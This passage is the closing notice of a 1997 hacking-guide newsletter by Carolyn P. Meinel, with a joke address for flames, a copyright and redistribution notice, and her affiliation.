                  and be sure to state in your message that you want me to keep this
                  confidential. If you wish your message posted anonymously, please say so!
                  Direct flames to dev/null@techbroker.com. Happy hacking!
                  Copyright 1997 Carolyn P. Meinel. You may forward  or post on your Web site
                  this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at
                  the end..
                  Carolyn Meinel
                  M/B Research -- The Technology Brokers